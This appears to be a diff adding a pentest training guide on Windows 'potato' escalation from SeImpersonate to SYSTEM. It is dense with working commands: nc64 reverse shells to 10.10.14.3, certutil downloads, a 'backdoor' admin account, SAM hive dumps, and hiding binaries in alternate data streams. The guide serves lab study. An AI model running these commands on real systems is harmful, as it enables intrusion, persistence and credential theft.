T1564.004](https://attack.mitre.org/techniques/T1564/004/) · [Sysinternals streams](https://learn.microsoft.com/sysinternals/downloads/streams) | - ---- - -[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide →](/sheets/privilege-escalation/windows-privesc) -\ No newline at end of file diff --git a/src/content/sheets/pentest-workflow/potato-attacks-guide.md b/src/content/sheets/pentest-workflow/potato-attacks-guide.md @@ -0,0 +1,617 @@ +--- +title: "Potato Attacks — SeImpersonate to SYSTEM" +description: "Windows SeImpersonate → SYSTEM with the whole potato family (PrintSpoofer, GodPotato, JuicyPotatoNG, RoguePotato, EfsPotato, SweetPotato): what each abuses, every useful flag, delivery from MSSQL/IIS/WinRM, and a repeatable field method with an HTB Jeeves worked example." +category: pentest-workflow +subcategory: "Companion Guides" +order: 25 +tags: ["htb", "cpts", "windows", "privilege-escalation", "token-impersonation", "seimpersonate", "potato", "printspoofer", "godpotato", "juicypotatong", "roguepotato", "efspotato", "sweetpotato", "pentest-workflow"] +tools: ["PrintSpoofer", "GodPotato", "JuicyPotatoNG", "RoguePotato", "EfsPotato", "SweetPotato", "socat", "xp_cmdshell"] +difficulty: advanced +updated: "2026-09-17" +source: "vault:PrivEsc/PrivEsc - Windows.md (Token Manipulation & Potato Attacks)" +--- + +[← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) · [Workflow dashboard](/sheets/pentest-workflow/attacking-common-modules-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) · [Alternate Data Streams guide →](/sheets/pentest-workflow/alternate-data-streams-guide) + +# Potato Attacks — SeImpersonate to SYSTEM `fas:ClipboardList` + +> [!dashboard] What this is +> The long-form companion to the potato line in the [Windows Privilege Escalation cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts#2--token-privilege-abuse). The cheat sheet gives you the one-liner mid-box; this guide explains *what each potato actually abuses*, walks every useful flag, and shows how to deliver them from an MSSQL shell / IIS web shell / WinRM. Once you land SYSTEM, pair it with the [Alternate Data Streams guide](/sheets/pentest-workflow/alternate-data-streams-guide) — staging the binary off a directory listing, stripping Mark-of-the-Web, and finding data (including flags) other users hid in a stream. + +Almost every service account on Windows — `IIS APPPOOL\*`, `NT SERVICE\MSSQLSERVER`, `LOCAL SERVICE`, `NETWORK SERVICE`, and most third-party service accounts — holds **`SeImpersonatePrivilege`**. That one privilege is the whole game. If you land a shell as one of these accounts (a web shell, `xp_cmdshell`, a cracked service credential), a potato turns it into `NT AUTHORITY\SYSTEM` in a single command. The potatoes differ only in *how they trick SYSTEM into authenticating to something you control* so you can steal its token. + +## The gate check — do you even have a potato path? `fas:Terminal` + +Everything here lives or dies on one line. Run it first, every time: + +```batch +whoami /priv +``` + +You are looking for either of these in the **Enabled** state: + +| Privilege | What it lets you do | Who usually has it | +|---|---|---| +| `SeImpersonatePrivilege` | Impersonate a client after it authenticates to you | IIS AppPool, MSSQL, `LOCAL SERVICE`, `NETWORK SERVICE`, most service accounts | +| `SeAssignPrimaryTokenPrivilege` | Assign a primary token to a new process | Some service accounts, scheduled-task contexts | + +> [!warning]+ No privilege, no potato +> `fas:TriangleExclamation` +> If `whoami /priv` shows neither privilege (or shows them **Disabled** with no way to enable them), the potato family is a dead end — go back to the [Windows PrivEsc cheat sheet](/sheets/pentest-workflow/windows-privesc-cpts) for services, registry, credential hunting, and kernel paths. A privilege that is present but *Disabled* is fine: potatoes enable it themselves at runtime through the token they steal. + +### How a potato works (the shared skeleton) + +Every tool below follows the same three beats. Only step 1 changes between them. + +<figure class="flow plate corners"> + <figcaption class="flow__cap"><span class="flow__kind">The potato pattern — four beats</span><span class="flow__dir">LR</span></figcaption> + <div class="flow__body"> + <div class="flow__diagram" data-dir="lr"> + <div class="flow-rank"><div class="flow-node is-entry">1 · Coerce SYSTEM to authenticate<span class="sub">to a listener you control</span><span class="sub">(Spooler pipe / DCOM OXID / EFS RPC)</span></div></div> + <div class="flow-edge"></div> + <div class="flow-rank"><div class="flow-node">2 · Catch the auth and negotiate<span class="sub">a SYSTEM security context</span><span class="sub">(NTLM / SSPI)</span></div></div> + <div class="flow-edge"></div> + <div class="flow-rank"><div class="flow-node">3 · Impersonate the SYSTEM token<span class="sub">(needs SeImpersonate)</span></div></div> + <div class="flow-edge"></div> + <div class="flow-rank"><div class="flow-node is-goal">4 · CreateProcessWithToken / AsUser<span class="sub">→ your command runs as SYSTEM</span></div></div> + </div> + </div> +</figure> + +The named difference — Print Spooler bug, DCOM/RPC OXID resolver, MS-EFSR — is just *the coercion trick in step 1*. When one is patched or disabled, you switch tools, not techniques. + +> [!success]+ Grab the binaries — checksum-verified, offline mirror +> `fas:Toolbox` +> Mirrored on this site (self-hosted, no third-party fetch). Verify the hash before you run anything you pulled off the internet on a client box: +> - **PrintSpoofer:** [PrintSpoofer64.exe](/downloads/pentest-workflow/PrintSpoofer64.exe) ([SHA-256](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/PrintSpoofer64.exe.sha256.asc)) +> - **GodPotato (.NET 4.x):** [GodPotato-NET4.exe](/downloads/pentest-workflow/GodPotato-NET4.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET4.exe.sha256.asc)) +> - **GodPotato (.NET 3.5):** [GodPotato-NET35.exe](/downloads/pentest-workflow/GodPotato-NET35.exe) ([SHA-256](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256) · [GPG signature](/downloads/pentest-workflow/GodPotato-NET35.exe.sha256.asc)) +> - **JuicyPotato (legacy):** [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) ([SHA-256](/downloads/pentest-workflow/JuicyPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/JuicyPotato.exe.sha256.asc)) +> - **SweetPotato:** [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)) +> - **nc64.exe** (reverse-shell stand-in): [nc64.exe](/downloads/pentest-workflow/nc64.exe) ([SHA-256](/downloads/pentest-workflow/nc64.exe.sha256) · [GPG signature](/downloads/pentest-workflow/nc64.exe.sha256.asc)) +> +> Not yet mirrored here — pull from source and rebuild/verify yourself: [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG), [RoguePotato](https://github.com/antonioCoco/RoguePotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato). + +--- + +## Which potato, when? `fas:Route` + +Confirm the build first — `[environment]::OSVersion.Version` (PowerShell) or `ver` (cmd) — then work down this list. The order is "most reliable / least noisy" first. + +| Tool | Coercion primitive | Needs | Works on | Reach for it when | +|---|---|---|---|---| +| **PrintSpoofer** | Print Spooler named pipe (`\pipe\spoolss`) | SeImpersonate **+ Spooler service running** | Win10 / Server 2016–2019 (and later where Spooler is up) | First choice — one binary, no network, interactive shell. | +| **GodPotato** | DCOM/RPC OXID resolver (local) | SeImpersonate, matching .NET runtime | Server 2012–2022, Win8–11 | Spooler is disabled/absent (common on Server 2019+/Win11). Broadest coverage — try it first if unsure. | +| **JuicyPotatoNG** | DCOM with a working CLSID + local SSPI on port 10247 | SeImpersonate | Win10 / Server 2016–2022 (pre-patch) | You want the classic JuicyPotato technique revived on a modern build; PrintSpoofer/GodPotato both failed. | +| **RoguePotato** | Remote OXID resolver via a redirector on port 135 | SeImpersonate + outbound/redirected 135 | Server 2019 / Win10 1809+ | DCOM is usable but you need the fake OXID trick; you can stand up a `socat` redirector. | +| **EfsPotato** | MS-EFSR (EFS RPC) local coercion | SeImpersonate or SeAssignPrimaryToken | Modern builds; multiple RPC interfaces to dodge patches | Great from `xp_cmdshell` / web shells; small, self-contained, swaps RPC pipes when one is patched. | +| **SweetPotato** | Bundles several (EfsRpc, PrintSpoofer, RottenPotato, DCOM) | SeImpersonate | Modern builds | You want one binary with a fallback `-e` selector; good "if this fails, switch mode" tool. | + +<figure class="flow plate corners"> + <figcaption class="flow__cap"><span class="flow__kind">Which potato? — a fallback ladder</span><span class="flow__dir">TD</span></figcaption> + <div class="flow__body"> + <svg class="flow-svg" viewBox="0 0 630 720" role="img" aria-label="Decision tree for choosing a potato privilege-escalation tool, falling through PrintSpoofer, GodPotato, SweetPotato, JuicyPotatoNG and RoguePotato as each fails"> + <path class="fedge" d="M360,90 L360,150" marker-end="url(#flow-arrow)" /> + <path class="fedge" d="M300,90 L300,120 L120,120 L120,150" marker-end="url(#flow-arrow)" /> + <path class="fedge" d="M300,210 L300,240 L120,240 L120,270" marker-end="url(#flow-arrow)" /> + <path class="fedge" d="M420,210 L420,240 L470,240 L470,270" marker-end="url(#flow-arrow)" /> + <path class="fedge is-back" d="M235,300 L355,300" marker-end="url(#flow-arrow)" /> + <path class="fedge is-back" d="M470,330 L470,390" marker-end="url(#flow-arrow)" /> + <path class="fedge is-back" d="M470,450 L470,510" marker-end="url(#flow-arrow)" /> + <path class="fedge is-back" d="M470,570 L470,630" marker-end="url(#flow-arrow)" /> + <g class="fnode is-decision"><rect class="fnode__box" x="245" y="30" width="230" height="60" /><text class="fnode__label" x="360" y="48" text-anchor="middle">whoami /priv:<tspan class="sub" x="360" dy="14">SeImpersonate or</tspan><tspan class="sub" x="360" dy="14">SeAssignPrimaryToken?</tspan></text></g> + <g class="fnode is-note"><rect class="fnode__box" x="5" y="150" width="230" height="60" /><text class="fnode__label" x="120" y="176" text-anchor="middle">Not a potato box —<tspan class="sub" x="120" dy="15">services / registry / creds / kernel</tspan></text></g> + <g class="fnode is-decision"><rect class="fnode__box" x="245" y="150" width="230" height="60" /><text class="fnode__label" x="360" y="176" text-anchor="middle">Print Spooler<tspan class="sub" x="360" dy="15">service running?</tspan></text></g> + <g class="fnode"><rect class="fnode__box" x="5" y="270" width="230" height="60" /><text class="fnode__label" x="120" y="296" text-anchor="middle">PrintSpoofer<tspan class="sub" x="120" dy="15">(interactive SYSTEM shell)</tspan></text></g> + <g class="fnode"><rect class="fnode__box" x="355" y="270" width="230" height="60" /><text class="fnode__label" x="470" y="296" text-anchor="middle">GodPotato<tspan class="sub" x="470" dy="15">(pick NET4 / NET35 by runtime)</tspan></text></g> + <g class="fnode"><rect class="fnode__box" x="355" y="390" width="230" height="60" /><text class="fnode__label" x="470" y="416" text-anchor="middle">SweetPotato -e EfsRpc<tspan class="sub" x="470" dy="15">or EfsPotato (swap RPC pipe)</tspan></text></g> + <g class="fnode"><rect class="fnode__box" x="355" y="510" width="230" height="60" /><text class="fnode__label" x="470" y="536" text-anchor="middle">JuicyPotatoNG<tspan class="sub" x="470" dy="15">(-s to seek a CLSID)</tspan></text></g> + <g class="fnode"><rect class="fnode__box" x="355" y="630" width="230" height="60" /><text class="fnode__label" x="470" y="656" text-anchor="middle">RoguePotato<tspan class="sub" x="470" dy="15">(+ socat :135 redirector)</tspan></text></g> + <g class="felabel"><rect class="felabel__box" x="343" y="112" width="34" height="16" /><text class="felabel__text" x="360" y="123" text-anchor="middle">Yes</text></g> + <g class="felabel"><rect class="felabel__box" x="197" y="112" width="26" height="16" /><text class="felabel__text" x="210" y="123" text-anchor="middle">No</text></g> + <g class="felabel"><rect class="felabel__box" x="193" y="232" width="34" height="16" /><text class="felabel__text" x="210" y="243" text-anchor="middle">Yes</text></g> + <g class="felabel"><rect class="felabel__box" x="432" y="232" width="26" height="16" /><text class="felabel__text" x="445" y="243" text-anchor="middle">No</text></g> + <g class="felabel"><rect class="felabel__box" x="274" y="292" width="42" height="16" /><text class="felabel__text" x="295" y="303" text-anchor="middle">fails</text></g> + <g class="felabel"><rect class="felabel__box" x="449" y="352" width="42" height="16" /><text class="felabel__text" x="470" y="363" text-anchor="middle">fails</text></g> + <g class="felabel"><rect class="felabel__box" x="449" y="472" width="42" height="16" /><text class="felabel__text" x="470" y="483" text-anchor="middle">fails</text></g> + <g class="felabel"><rect class="felabel__box" x="395" y="592" width="150" height="16" /><text class="felabel__text" x="470" y="603" text-anchor="middle">DCOM blocked outbound</text></g> + </svg> + </div> +</figure> + +--- + +## PrintSpoofer `fas:Terminal` + +**Abuses:** the Print Spooler service. PrintSpoofer coerces `spoolsv.exe` (running as SYSTEM) to connect back to a named pipe it controls, then impersonates the SYSTEM token off that pipe. No network egress, no DCOM — everything happens over local IPC. + +**Requirements:** `SeImpersonatePrivilege` **and** the Print Spooler service running (`sc query spooler` → `RUNNING`). On many Server 2019+/Win11 builds the Spooler is disabled by default post-PrintNightmare — that is your cue to switch to GodPotato. + +```batch +:: Interactive SYSTEM shell in your current console — the go-to +PrintSpoofer64.exe -i -c cmd + +:: Fire a single command as SYSTEM (non-interactive) +PrintSpoofer64.exe -c "whoami" +PrintSpoofer64.exe -c "net localgroup administrators lowpriv /add" + +:: Reverse shell back to your handler (catch with: nc -lnvp 8443) +PrintSpoofer64.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" + +:: Spawn on a specific logon session (e.g. pop a shell on an RDP user's desktop) +PrintSpoofer64.exe -d 1 -c cmd +``` + +| Flag | Meaning | +|---|---| +| `-c <CMD>` | Command to run as SYSTEM (wrap in quotes; use `cmd /c ...` for shell built-ins) | +| `-i` | Interact with the new process in the **current** console — this is what gives you a live SYSTEM shell | +| `-d <SESSION_ID>` | Create the process in the given logon session / desktop (see `query session`) | +| `-p <PROGRAM>` | Program to launch (default `C:\Windows\System32\cmd.exe`) | +| `-h` | Help | + +> [!tip]+ Everything PrintSpoofer can do +> `fas:Lightbulb` +> Anything `cmd`/a program can do, now as SYSTEM: pop an interactive shell (`-i -c cmd`), run one command (`-c`), throw a reverse shell, add a local admin, launch a Meterpreter/Sliver stager, read `C:\Windows\System32\config\SAM`, or spawn on another user's desktop with `-d`. It does **not** need outbound network — ideal on segmented internal hosts where DCOM/135 is filtered. + +--- + +## GodPotato `fas:Terminal` + +**Abuses:** DCOM. GodPotato stands up a local fake OXID resolver and drives a DCOM activation so a SYSTEM RPC context authenticates to it, then impersonates. It is the broadest-coverage modern potato — **Server 2012 through 2022, Windows 8 through 11** — and needs no Print Spooler. + +**Requirements:** `SeImpersonatePrivilege` and a matching .NET runtime. Pick the binary by what is installed: `GodPotato-NET4.exe` for .NET 4.x (the common case), `GodPotato-NET35.exe` when only .NET 2.0/3.5 is present. Check with `dir %WINDIR%\Microsoft.NET\Framework\`. + +```batch +:: Prove it — run whoami as SYSTEM +GodPotato-NET4.exe -cmd "cmd /c whoami" + +:: Add a local admin / new user +GodPotato-NET4.exe -cmd "cmd /c net user backdoor P@ssw0rd123! /add" +GodPotato-NET4.exe -cmd "cmd /c net localgroup administrators backdoor /add" + +:: Reverse shell (catch with nc -lnvp 8443) +GodPotato-NET4.exe -cmd "cmd /c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" + +:: .NET 3.5-only host +GodPotato-NET35.exe -cmd "cmd /c whoami" +``` + +| Flag | Meaning | +|---|---| +| `-cmd <COMMAND>` | Command to execute as SYSTEM (prefix with `cmd /c` for built-ins like `whoami`, `net`, `type`) | +| `-rpc_port <PORT>` | Pin the internal RPC listener port (default is chosen automatically; set it if a port collides) | +| `-h` | Help | + +> [!tip]+ Everything GodPotato can do +> `fas:Lightbulb` +> Single-shot command execution as SYSTEM with the widest OS coverage of the family and **no Spooler and no external network** required. Use it to run a reverse shell, add an admin, dump hives, or kick off a C2 stager. Because it is fully local it is the reliable fallback whenever PrintSpoofer's Spooler dependency isn't met. It runs one command per invocation, so for a shell, have it launch `nc64.exe` or a stager rather than expecting an interactive prompt. + +--- + +## JuicyPotatoNG `fas:Terminal` + +**Abuses:** DCOM, like the original JuicyPotato, but revived for modern Windows. It uses a CLSID that still resolves for service accounts and negotiates the SYSTEM context locally over SSPI on a fixed port (default **10247**), sidestepping the 2018 DCOM hardening that killed classic JuicyPotato. + +**Requirements:** `SeImpersonatePrivilege`. Works on Windows 10 / Server 2016–2022 depending on patch level. Not bundled here — build from [source](https://github.com/antonioCoco/JuicyPotatoNG). + +```batch +:: Default run — uses a built-in working CLSID and port 10247, runs cmd +JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" + +:: Reverse shell +JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" + +:: Let it seek a usable CLSID for this exact build +JuicyPotatoNG.exe -s -p "C:\Windows\System32\cmd.exe" -a "/c whoami" + +:: Custom COM listen port if 10247 is taken +JuicyPotatoNG.exe -t * -l 10999 -p cmd.exe -a "/c whoami" +``` + +| Flag | Meaning | +|---|---| +| `-t <a\|u\|*>` | Token-creation call: `u` = `CreateProcessWithTokenW` (needs SeImpersonate), `a` = `CreateProcessAsUser` (needs SeAssignPrimaryToken), `*` = try both | +| `-p <PROGRAM>` | Program to launch (default `cmd.exe`) | +| `-a <ARGS>` | Arguments passed to the program (e.g. `"/c whoami"`) | +| `-l <PORT>` | Local COM server listen port (default `10247`) | +| `-c <CLSID>` | Use a specific CLSID instead of the built-in default | +| `-s` | Seek — probe for a CLSID that works on this host | +| `-b` | Bruteforce all CLSIDs (loud; last resort) | +| `-i` | Interactive (run the program in the current console) | + +> [!info]+ JuicyPotatoNG vs. the legacy JuicyPotato +> `fas:Lightbulb` +> The bundled [JuicyPotato.exe](/downloads/pentest-workflow/JuicyPotato.exe) is the **legacy** tool — dead on Server 2019 / Windows 10 1809 and later because of DCOM hardening; keep it only for Server 2016-and-older targets (`JuicyPotato.exe -l 53375 -p cmd.exe -a "/c whoami" -t *`, needs a CLSID matching the OS). **JuicyPotatoNG** is the modern rewrite that works past that hardening. If you're on anything current, use NG, not the legacy binary. + +--- + +## RoguePotato `fas:Terminal` + +**Abuses:** DCOM with a *remote* OXID resolver. RoguePotato forces the DCOM OXID resolution to go out to TCP **135** on a host you control, which redirects it back to a local listener — letting you complete the SYSTEM NTLM negotiation on builds where the fully-local trick doesn't fire. + +**Requirements:** `SeImpersonatePrivilege`, and the ability to reach an attacker-controlled resolver on port 135 (you run a `socat` redirector). This is the one potato with a network dependency. Not bundled here — build from [source](https://github.com/antonioCoco/RoguePotato). + +```bash +# On YOUR box: redirect victim's 135 back to its RoguePotato listener (default 9999) +socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999 +``` + +```batch +:: On the victim: -r = your redirector IP, -l = local OXID listener, -e = command +RoguePotato.exe -r 10.10.14.3 -e "cmd.exe /c whoami > C:\Windows\Temp\r.txt" -l 9999 + +:: Reverse shell variant +RoguePotato.exe -r 10.10.14.3 -e "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" -l 9999 +``` + +| Flag | Meaning | +|---|---| +| `-r <IP>` | Remote OXID resolver IP — your box running the `socat` redirect on 135 | +| `-e <COMMAND>` | Command to execute as SYSTEM | +| `-l <PORT>` | Local fake OXID resolver listen port (default `9999`; must match the `socat` target) | +| `-c <CLSID>` | Specific CLSID to activate | +| `-p <PIPE>` | Named pipe to use (advanced) | +| `-z` | Test mode — check whether the technique will work without executing | + +> [!warning]+ RoguePotato needs egress to port 135 +> `fas:TriangleExclamation` +> If outbound/redirected 135 to your redirector is blocked (very common on segmented internal networks), RoguePotato can't complete. In that case fall back to a fully-local potato — GodPotato, EfsPotato, or SweetPotato's EfsRpc mode — which need no network at all. + +--- + +## EfsPotato `fas:Terminal` + +**Abuses:** MS-EFSR, the Encrypting File System Remote Protocol (the same RPC family as PetitPotam). EfsPotato coerces SYSTEM to authenticate to a local pipe via an EFS RPC call, then impersonates. It exposes **several RPC interfaces**, so when Microsoft patches one you switch to another with a single argument. + +**Requirements:** `SeImpersonatePrivilege` **or** `SeAssignPrimaryTokenPrivilege`. It is tiny and self-contained, which makes it a favourite from `xp_cmdshell` and cramped web shells. Not bundled here — grab or compile from [source](https://github.com/zcgonvh/EfsPotato) (single `.cs`, buildable on-target with `csc.exe`). + +```batch +:: Simplest form — run a command as SYSTEM +EfsPotato.exe "whoami" +EfsPotato.exe "net user backdoor P@ssw0rd123! /add" + +:: Pick a specific RPC pipe when the default is patched +:: valid pipes: lsarpc | efsrpc | samr | lsass | netlogon +EfsPotato.exe "whoami" lsarpc +EfsPotato.exe "whoami" efsrpc + +:: Reverse shell +EfsPotato.exe "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" +``` + +```powershell +# Compile on-target if you only have the .cs (no external toolchain needed) +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /nowarn:1691,618 EfsPotato.cs +``` + +| Argument | Meaning | +|---|---| +| `<command>` (1st positional) | Command to run as SYSTEM | +| `<pipe>` (2nd positional, optional) | RPC interface to abuse: `lsarpc`, `efsrpc`, `samr`, `lsass`, `netlogon` — rotate through these if the default is blocked/patched | + +> [!tip]+ Everything EfsPotato can do +> `fas:Lightbulb` +> Fully local (no Spooler, no network), tiny, and compilable on-target — which is why it shines from MSSQL `xp_cmdshell` and low-footprint web shells. Its standout feature is the **swappable RPC pipe**: if `EfsPotato.exe "whoami"` fails because one interface is patched, retry with `lsarpc`, then `efsrpc`, then `samr`, etc. SweetPotato's `EfsRpc` mode is the same primitive wrapped in a bigger multi-tool. + +--- + +## SweetPotato `fas:Terminal` + +**Abuses:** whatever you select. SweetPotato bundles several coercion primitives behind a `-e` switch — commonly `EfsRpc` (default), `PrintSpoofer`, and `DCOM` (older/other forks also carry `RottenPotato`) — so a single binary carries built-in fallbacks. When one mode fails, change `-e` instead of uploading a new tool. The exact set depends on the fork; run `SweetPotato.exe -h` to see what your build exposes. + +**Requirements:** `SeImpersonatePrivilege`. Modern builds. Bundled: [SweetPotato.exe](/downloads/pentest-workflow/SweetPotato.exe) ([SHA-256](/downloads/pentest-workflow/SweetPotato.exe.sha256) · [GPG signature](/downloads/pentest-workflow/SweetPotato.exe.sha256.asc)). + +```batch +:: Default (EfsRpc mode) — run a command as SYSTEM +SweetPotato.exe -a "/c whoami" + +:: Force a specific technique +SweetPotato.exe -e EfsRpc -p C:\Windows\System32\cmd.exe -a "/c whoami" +SweetPotato.exe -e PrintSpoofer -p C:\Windows\System32\cmd.exe -a "/c whoami" +SweetPotato.exe -e DCOM -p C:\Windows\System32\cmd.exe -a "/c whoami" + +:: Reverse shell +SweetPotato.exe -a "/c c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" +``` + +| Flag | Meaning | +|---|---| +| `-e <EXPLOIT>` | Technique: `EfsRpc` (default), `PrintSpoofer`, `DCOM` (fork-dependent; some carry `RottenPotato`) | +| `-p <PROGRAM>` | Program to launch (default `cmd.exe`) | +| `-a <ARGS>` | Arguments (e.g. `"/c whoami"`) | +| `-l <PORT>` | COM server listen port (for `DCOM`/`RottenPotato` modes) | +| `-c <CLSID>` | CLSID for DCOM-based modes | + +> [!tip]+ Everything SweetPotato can do +> `fas:Lightbulb` +> It's the "one binary, several potatoes" option. Start with the default `EfsRpc`, and if it fails cycle `-e PrintSpoofer` (needs the Spooler) → `-e DCOM` → `-e RottenPotato`. Handy when you can only upload one file but don't know yet which primitive the target will accept. + +--- + +## Delivery — getting a potato onto the box and running it `fas:RocketLaunch` + +You rarely get a clean interactive prompt. These are the common contexts where you already hold a `SeImpersonate` account and how to drive a potato from each. Transfer methods (SMB, HTTP, `certutil`, `iwr`) are in [Foothold — File Transfers](/sheets/pentest-workflow/foothold-file-transfers). + +### From MSSQL `xp_cmdshell` + +MSSQL service accounts almost always hold `SeImpersonate`. This is the classic MSSQL → SYSTEM chain. + +```sql +-- 1) enable xp_cmdshell +EXEC sp_configure 'show advanced options', 1; RECONFIGURE; +EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; + +-- 2) confirm the privilege +EXEC xp_cmdshell 'whoami /priv'; + +-- 3) stage the potato (HTTP pull from your box) +EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.3/GodPotato-NET4.exe C:\Windows\Temp\g.exe'; + +-- 4) fire it as SYSTEM +EXEC xp_cmdshell 'C:\Windows\Temp\g.exe -cmd "cmd /c net localgroup administrators sql_svc /add"'; +``` + +### From an IIS / ASPX web shell + +IIS AppPool identities hold `SeImpersonate` by design. From a web shell (`whoami` → `iis apppool\...`): + +```powershell +# Pull the tool, then run it — one command per web-shell request +Invoke-WebRequest -Uri http://10.10.14.3/PrintSpoofer64.exe -OutFile C:\Windows\Temp\ps.exe +C:\Windows\Temp\ps.exe -c "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" +``` + +`C:\Windows\Temp` and `C:\Windows\System32\spool\drivers\color` are usually writable by the AppPool identity — good staging spots. See [Web Shells](/sheets/pentest-workflow/web-shells) for the shell itself. + +### From WinRM / evil-winrm + +```bash +# On your box +evil-winrm -i 10.10.10.100 -u svc_web -p 'Password123!' +``` + +```powershell +# Inside the session — upload is built into evil-winrm +upload /opt/tools/GodPotato-NET4.exe C:\Windows\Temp\g.exe +C:\Windows\Temp\g.exe -cmd "cmd /c whoami" +``` + +> [!tip]+ Interactive vs. one-shot potatoes +> `fas:Lightbulb` +> **PrintSpoofer** (`-i -c cmd`) and **JuicyPotatoNG** (`-i`) can hand you a *live* SYSTEM prompt. **GodPotato**, **EfsPotato**, **RoguePotato**, and **SweetPotato** run one command per invocation — so from those, have them launch `nc64.exe`/a C2 stager for your shell rather than expecting a prompt to appear. + +### SYSTEM payload cookbook + +What to actually run once a potato lands you SYSTEM. Track every artefact you create for cleanup. + +```batch +:: Interactive shell (PrintSpoofer / JuicyPotatoNG) +... -i -c cmd + +:: Reverse shell (any potato) — nc -lnvp 8443 on your box +... "c:\tools\nc64.exe 10.10.14.3 8443 -e cmd" + +:: Local admin (loud, logged — prefer a shell/token over a new account on real engagements) +... "cmd /c net user backdoor P@ssw0rd123! /add & net localgroup administrators backdoor /add" + +:: Dump the SAM/SYSTEM hives for offline hash extraction +... "cmd /c reg save HKLM\SAM C:\Windows\Temp\sam.sav /y & reg save HKLM\SYSTEM C:\Windows\Temp\sys.sav /y" + +:: Stage a Meterpreter/Sliver/C2 beacon as SYSTEM +... "cmd /c C:\Windows\Temp\beacon.exe" +``` + +Then pull the hives and crack offline: `impacket-secretsdump -sam sam.sav -system sys.sav LOCAL`. + +> [!info]+ Staging the binary itself without it showing in a directory listing +> `fas:Lightbulb` +> Drop the potato binary inside an NTFS Alternate Data Stream on a boring file (`type g.exe > log.txt:g.exe`) so a casual `dir` in `C:\Windows\Temp` shows nothing, then extract it back to a normal path right before you run it. Full mechanics — reading, writing, hiding, and stripping Mark-of-the-Web — are in the [Alternate Data Streams guide](/sheets/pentest-workflow/alternate-data-streams-guide). + +--- + +## Field method — finding and landing a SeImpersonate → SYSTEM chain `fas:Route` + +The potatoes are the easy part. The skill is the four steps *around* them: recognise that your shell holds impersonation rights, fingerprint the host so you pick a tool that actually fires on **this** build, get the binary across when the box has no download tools, then drive it non-interactively and read the result. Below is that method as a repeatable loop. A single awkward old box — HTB Jeeves, Windows 10 build 10586 — runs underneath as a case study, because the boxes where the *newest* potato fails are exactly the ones that teach you why fingerprinting matters. + +<figure class="flow plate corners"> + <figcaption class="flow__cap"><span class="flow__kind">Run a potato — the loop</span><span class="flow__dir">TD</span></figcaption> + <div class="flow__body"> + <svg class="flow-svg" viewBox="0 0 790 700" role="img" aria-label="Enumerate privileges, pick a tool by OS era, transfer and fire it, check for SYSTEM; on failure switch tool and retry, on success move to SYSTEM recon"> + <path class="fedge" d="M300,90 L300,140" marker-end="url(#flow-arrow)" /> + <path class="fedge" d="M300,200 L300,250" marker-end="url(#flow-arrow)" /> + <path class="fedge" d="M300,310 L300,360" marker-end="url(#flow-arrow)" /> + <path class="fedge" d="M300,420 L300,470" marker-end="url(#flow-arrow)" /> + <path class="fedge" d="M300,530 L300,600" marker-end="url(#flow-arrow)" /> + <path class="fedge is-back" d="M425,500 L620,500 L620,200" marker-end="url(#flow-arrow)" /> + <path class="fedge is-back" d="M495,170 L427,170" marker-end="url(#flow-arrow)" /> + <g class="fnode is-entry"><rect class="fnode__box" x="175" y="30" width="250" height="60" /><text class="fnode__label" x="300" y="56" text-anchor="middle">1 · whoami /priv + /groups<tspan class="sub" x="300" dy="15">SeImpersonate? SERVICE token?</tspan></text></g> + <g class="fnode"><rect class="fnode__box" x="175" y="140" width="250" height="60" /><text class="fnode__label" x="300" y="166" text-anchor="middle">2 · systeminfo → OS build<tspan class="sub" x="300" dy="15">choose tool by DCOM era</tspan></text></g> + <g class="fnode"><rect class="fnode__box" x="175" y="250" width="250" height="60" /><text class="fnode__label" x="300" y="276" text-anchor="middle">3 · Transfer the binary<tspan class="sub" x="300" dy="15">certutil / IWR / SMB share</tspan></text></g> + <g class="fnode"><rect class="fnode__box" x="175" y="360" width="250" height="60" /><text class="fnode__label" x="300" y="386" text-anchor="middle">4 · Fire non-interactively<tspan class="sub" x="300" dy="15">output → a file you can read</tspan></text></g> + <g class="fnode is-decision"><rect class="fnode__box" x="175" y="470" width="250" height="60" /><text class="fnode__label" x="300" y="496" text-anchor="middle">authresult 0 /<tspan class="sub" x="300" dy="15">NT AUTHORITY\SYSTEM?</tspan></text></g> + <g class="fnode is-note"><rect class="fnode__box" x="495" y="140" width="250" height="60" /><text class="fnode__label" x="620" y="166" text-anchor="middle">Wrong tool for the era —<tspan class="sub" x="620" dy="15">switch potato, not port</tspan></text></g> + <g class="fnode is-goal"><rect class="fnode__box" x="175" y="600" width="250" height="66" /><text class="fnode__label" x="300" y="622" text-anchor="middle">5 · SYSTEM recon:<tspan class="sub" x="300" dy="14">dir /r other profiles → read ADS,</tspan><tspan class="sub" x="300" dy="14">creds, 